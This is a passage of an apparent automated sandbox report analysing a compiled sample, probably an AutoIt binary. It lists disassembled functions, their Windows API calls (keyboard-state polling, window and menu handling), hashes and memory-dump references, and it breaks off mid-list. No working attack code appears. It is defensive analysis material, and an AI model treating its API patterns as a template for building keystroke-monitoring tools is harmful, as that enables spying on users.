                                          • API String ID: 1246142700-0
                                          • Opcode ID: 6cd664833a987df213df4e0a599c17821eceb938d96bde4e5a45820e4e638131
                                          • Instruction ID: 0939ef7a7b6d8f75942a00d81f5e8d957323812efe714933651168f3c1f79e7a
                                          • Opcode Fuzzy Hash: 6cd664833a987df213df4e0a599c17821eceb938d96bde4e5a45820e4e638131
                                          • Instruction Fuzzy Hash: 4CB1ED75A00119AFDB04DFA4D884DEEBBB9FF49305B148469F905EB261DB30EE85CB50
                                          Function 0011081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00110896
                                          • SetKeyboardState.USER32(?), ref: 00110901
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00110921
                                          • GetKeyState.USER32(000000A0), ref: 00110938
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00110967
                                          • GetKeyState.USER32(000000A1), ref: 00110978
                                          • GetAsyncKeyState.USER32(00000011), ref: 001109A4
                                          • GetKeyState.USER32(00000011), ref: 001109B2
                                          • GetAsyncKeyState.USER32(00000012), ref: 001109DB
                                          • GetKeyState.USER32(00000012), ref: 001109E9
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00110A12
                                          • GetKeyState.USER32(0000005B), ref: 00110A20
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: b1915c1044ad64f4968eab320f402342beff363356a722271eaffa115f978d12
                                          • Instruction ID: 4278b68db7efd26f6c169cbfb54910e09f8be049262e888332c5d8ed6097073c
                                          • Opcode Fuzzy Hash: b1915c1044ad64f4968eab320f402342beff363356a722271eaffa115f978d12
                                          • Instruction Fuzzy Hash: 1C51CA20E0878829FB3ADBA048107EAFFB49F15384F0845AD95C65B5C3DBE49ACCC791
                                          Function 0010CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,00000001), ref: 0010CE1C
                                          • GetWindowRect.USER32(00000000,?), ref: 0010CE2E
                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0010CE8C
                                          • GetDlgItem.USER32(?,00000002), ref: 0010CE97
                                          • GetWindowRect.USER32(00000000,?), ref: 0010CEA9
                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0010CEFD
                                          • GetDlgItem.USER32(?,000003E9), ref: 0010CF0B
                                          • GetWindowRect.USER32(00000000,?), ref: 0010CF1C
                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0010CF5F
                                          • GetDlgItem.USER32(?,000003EA), ref: 0010CF6D
                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0010CF8A
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0010CF97
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$ItemMoveRect$Invalidate
                                          • String ID:
                                          • API String ID: 3096461208-0
                                          • Opcode ID: f5a5eeb8794f18a7eba37a18243e35388ccdf99e61e70b84ce17b76e22d46b17
                                          • Instruction ID: f702824854890cc069205ad5f06d5881e63ebb7187edb1855e90f9b81d9cbd7d
                                          • Opcode Fuzzy Hash: f5a5eeb8794f18a7eba37a18243e35388ccdf99e61e70b84ce17b76e22d46b17
                                          • Instruction Fuzzy Hash: 41516375B00205AFDF18CF69CD85AAEBBB6EB88711F14822DF616D72D0D7B0AD408B50
                                          Function 000B23F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000B2412,?,00000000,?,?,?,?,000B1AA7,00000000,?), ref: 000B1F76
                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 000B24AF
                                          • KillTimer.USER32(-00000001,?,?,?,?,000B1AA7,00000000,?,?,000B1EBE,?,?), ref: 000B254A
                                          • DestroyAcceleratorTable.USER32(00000000), ref: 000EBFE7
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000B1AA7,00000000,?,?,000B1EBE,?,?), ref: 000EC018
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000B1AA7,00000000,?,?,000B1EBE,?,?), ref: 000EC02F
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000B1AA7,00000000,?,?,000B1EBE,?,?), ref: 000EC04B
                                          • DeleteObject.GDI32(00000000), ref: 000EC05D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                          • String ID:
                                          • API String ID: 641708696-0
                                          • Opcode ID: 56cc02e27c0a1c93d278a17a8117eeac896515832d175886232b3f9ab81e0c8c
                                          • Instruction ID: 108d03090d7b09aee160b39e2689d4325bf157f29c646a91f96041aa62e48b12
                                          • Opcode Fuzzy Hash: 56cc02e27c0a1c93d278a17a8117eeac896515832d175886232b3f9ab81e0c8c
                                          • Instruction Fuzzy Hash: C1619831114640DFEB769F16D948BAABBF1FB44312F108528E48A6BEB0C771A8D1DF91
                                          Function 000B2581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B29AB: GetWindowLongW.USER32(?,000000EB), ref: 000B29BC
                                          • GetSysColor.USER32(0000000F), ref: 000B25AF
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ColorLongWindow
                                          • String ID:
                                          • API String ID: 259745315-0
                                          • Opcode ID: 0292cd5362de79a0a28acd59235fd4c725514828bd518e03f2453c7e6cb59611
                                          • Instruction ID: 2f5c6c77e7a211b3f2c88b35c25ad6a4a6358ba3ac91eff2f4a8a78ff91cb430
                                          • Opcode Fuzzy Hash: 0292cd5362de79a0a28acd59235fd4c725514828bd518e03f2453c7e6cb59611
                                          • Instruction Fuzzy Hash: EC41D231104540AFDB259F29DC88BF93BA5EB0A731F194265FE669A1F2C7318C82DB21
                                          Function 000C29BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000D0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,000C2A3E,?,00008000), ref: 000D0BA7
                                            • Part of subcall function 000D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C2A58,?,00008000), ref: 000D02A4
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000C2ADF
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 000C2C2C
                                            • Part of subcall function 000C3EBE: _wcscpy.LIBCMT ref: 000C3EF6
                                            • Part of subcall function 000D386D: _iswctype.LIBCMT ref: 000D3875
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                          • API String ID: 537147316-3738523708
                                          • Opcode ID: ae4568904f564736a6db40f43a002254aa5f352841f2ded8a94644c5a9315f07
                                          • Instruction ID: 0ca6133a2877586065fd095b16290636680b1db55fa7544c6db902c2b380067f
                                          • Opcode Fuzzy Hash: ae4568904f564736a6db40f43a002254aa5f352841f2ded8a94644c5a9315f07
                                          • Instruction Fuzzy Hash: 2502BF311083419FC724EF24C891EEFBBE5AF99354F00492DF59A932A2DB70DA49CB52
                                          Function 0011AEEA Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,00140980), ref: 0011AF4E
                                          • GetDriveTypeW.KERNEL32(00000061,0016B5F0,00000061), ref: 0011B018
                                          • _wcscpy.LIBCMT ref: 0011B042
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharDriveLowerType_wcscpy
                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                          • API String ID: 2820617543-1000479233
                                          • Opcode ID: f090e5583b60429fed84ebe370edcb5ef7b3b230483e2ddb104eda600e6b2437
                                          • Instruction ID: cdca5588e22fe85c1c16cefab2de57823a2bca6b353cd00683b3d93c2a1c6341
                                          • Opcode Fuzzy Hash: f090e5583b60429fed84ebe370edcb5ef7b3b230483e2ddb104eda600e6b2437
                                          • Instruction Fuzzy Hash: 2451B1711083059BC318EF14C8D1AEEB7A5EF95700F50482EF496972A3DB31DE8ACA53
                                          Function 000B4D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __i64tow__itow__swprintf
                                          • String ID: %.15g$0x%p$False$True
                                          • API String ID: 421087845-2263619337
                                          • Opcode ID: 159fc848ca8352e4faf0c6bf1fcc67cb02a2793afdf644c783b80cf4aa9740e5
                                          • Instruction ID: e63bf063af34244b38f5c124c8c6119c90474fae785cba1eb3948d61ed3d6bf5
                                          • Opcode Fuzzy Hash: 159fc848ca8352e4faf0c6bf1fcc67cb02a2793afdf644c783b80cf4aa9740e5
                                          • Instruction Fuzzy Hash: 3C419271608209AFDB34DF64D842EBA73E8EB45300F24446FF549D73A3EA719A418B21
                                          Function 00137777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0013778F
                                          • CreateMenu.USER32 ref: 001377AA
                                          • SetMenu.USER32(?,00000000), ref: 001377B9
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00137846
                                          • IsMenu.USER32(?), ref: 0013785C
                                          • CreatePopupMenu.USER32 ref: 00137866
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00137893
                                          • DrawMenuBar.USER32 ref: 0013789B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                          • String ID: 0$F
                                          • API String ID: 176399719-3044882817
                                          • Opcode ID: 5d4c5114ffd24da3102d9b9f1ec1b5d461d92a177dfdfa1b7b4b5ae1036ab640
                                          • Instruction ID: 3319b1fa6f88e70d5a33215937ebc3fb320bbaebc32ec5bfa412229853d02475
                                          • Opcode Fuzzy Hash: 5d4c5114ffd24da3102d9b9f1ec1b5d461d92a177dfdfa1b7b4b5ae1036ab640
                                          • Instruction Fuzzy Hash: F8414CB8A04209EFEB20DF65D888E9A7BF5FF49310F144469FA49A73A0D731A950DF50
                                          Function 00137AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00137B83
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00137B8A
                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00137B9D
                                          • SelectObject.GDI32(00000000,00000000), ref: 00137BA5
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00137BB0
                                          • DeleteDC.GDI32(00000000), ref: 00137BB9
                                          • GetWindowLongW.USER32(?,000000EC), ref: 00137BC3
                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00137BD7
                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00137BE3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                          • String ID: static
                                          • API String ID: 2559357485-2160076837
                                          • Opcode ID: 3df07a0b669e2e521a6dba5de2ef32e799d2eb47b4770025fe7e4d526432b035
                                          • Instruction ID: 841e77c9a77961e868fe8391b51111d00fca45dbd0bc4b3bac34e41baeff7b1b
                                          • Opcode Fuzzy Hash: 3df07a0b669e2e521a6dba5de2ef32e799d2eb47b4770025fe7e4d526432b035
                                          • Instruction Fuzzy Hash: 6F318A76104218ABDF229FA5DC49FDB7B69FF0E760F110214FA59A61E0C731D860DBA0
                                          Function 000D7030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 000D706B
                                            • Part of subcall function 000D8D58: __getptd_noexit.LIBCMT ref: 000D8D58
                                          • __gmtime64_s.LIBCMT ref: 000D7104
                                          • __gmtime64_s.LIBCMT ref: 000D713A
                                          • __gmtime64_s.LIBCMT ref: 000D7157
                                          • __allrem.LIBCMT ref: 000D71AD
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D71C9
                                          • __allrem.LIBCMT ref: 000D71E0
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D71FE
                                          • __allrem.LIBCMT ref: 000D7215
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D7233
                                          • __invoke_watson.LIBCMT ref: 000D72A4
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                          • String ID:
                                          • API String ID: 384356119-0
                                          • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                          • Instruction ID: b796e9befe9712c8488f0d20183929404873ba5fd8c1c014f5a0f2fb3aa0be75
                                          • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                          • Instruction Fuzzy Hash: 4571D671A04756ABD7149E79CC82BAAB7E9AF54324F14423BF518E73C2F770D9408BA0
                                          Function 00112CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00112CE9
                                          • GetMenuItemInfoW.USER32(00177890,000000FF,00000000,00000030), ref: 00112D4A
                                          • SetMenuItemInfoW.USER32(00177890,00000004,00000000,00000030), ref: 00112D80
                                          • Sleep.KERNEL32(000001F4), ref: 00112D92
                                          • GetMenuItemCount.USER32(?), ref: 00112DD6
                                          • GetMenuItemID.USER32(?,00000000), ref: 00112DF2
                                          • GetMenuItemID.USER32(?,-00000001), ref: 00112E1C
                                          • GetMenuItemID.USER32(?,?), ref: 00112E61
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00112EA7
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00112EBB
                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00112EDC
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                          • String ID:
                                          • API String ID: 4176008265-0
                                          • Opcode ID: 8816d6c1d8306f00ee870572465910d3d5b17972e2bf5866cf3abb0bbd9ed3fe
                                          • Instruction ID: dd5083b16990e2ac13fdb30ef8c69c759dde4033edfae03d0058fd65098ea969
                                          • Opcode Fuzzy Hash: 8816d6c1d8306f00ee870572465910d3d5b17972e2bf5866cf3abb0bbd9ed3fe
                                          • Instruction Fuzzy Hash: E561C070901249AFDF19DFA4DC88AFEBBB9EB05304F144069F851A7291D731ADE6CB21
                                          Function 00137548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001375CA
                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001375CD
                                          • GetWindowLongW.USER32(?,000000F0), ref: 001375F1
                                          • _memset.LIBCMT ref: 00137602
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00137614
                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0013768C
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$LongWindow_memset
                                          • String ID:
                                          • API String ID: 830647256-0
                                          • Opcode ID: a430c44bc87c8db1292f6e2eb44b91e40006e3526950948de7f59c026f1abf38
                                          • Instruction ID: 54768d361fc464411909c3491d033816d2945c3753285a9ca0d27c4aa762901a
                                          • Opcode Fuzzy Hash: a430c44bc87c8db1292f6e2eb44b91e40006e3526950948de7f59c026f1abf38
                                          • Instruction Fuzzy Hash: 26618CB5904208AFDB21DFA4CC85EEE77F8EB09710F144199FA15A72E1D770AD81DB60
                                          Function 001077B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001077DD
                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00107836
                                          • VariantInit.OLEAUT32(?), ref: 00107848
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00107868
                                          • VariantCopy.OLEAUT32(?,?), ref: 001078BB
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 001078CF
                                          • VariantClear.OLEAUT32(?), ref: 001078E4
                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 001078F1
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001078FA
                                          • VariantClear.OLEAUT32(?), ref: 0010790C
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00107917
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                          • String ID:
                                          • API String ID: 2706829360-0
                                          • Opcode ID: 26320f0fc6564ffb86e399f5261b8a1e51376bc3ac9071cda4d0cb535f7de2a4
                                          • Instruction ID: 522a2fc0e57c35ad31f4ace92df2a53efe1e395a0005315348f2af3d3a900204
                                          • Opcode Fuzzy Hash: 26320f0fc6564ffb86e399f5261b8a1e51376bc3ac9071cda4d0cb535f7de2a4
                                          • Instruction Fuzzy Hash: 45416335E00119DFCB01DFA5D8489EDBBB9FF08354F048469EA55A72A1C770AA85CFA0
                                          Function 00110508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00110530
                                          • GetAsyncKeyState.USER32(000000A0), ref: 001105B1
                                          • GetKeyState.USER32(000000A0), ref: 001105CC
                                          • GetAsyncKeyState.USER32(000000A1), ref: 001105E6
                                          • GetKeyState.USER32(000000A1), ref: 001105FB
                                          • GetAsyncKeyState.USER32(00000011), ref: 00110613
                                          • GetKeyState.USER32(00000011), ref: 00110625
                                          • GetAsyncKeyState.USER32(00000012), ref: 0011063D
                                          • GetKeyState.USER32(00000012), ref: 0011064F
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00110667
                                          • GetKeyState.USER32(0000005B), ref: 00110679
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
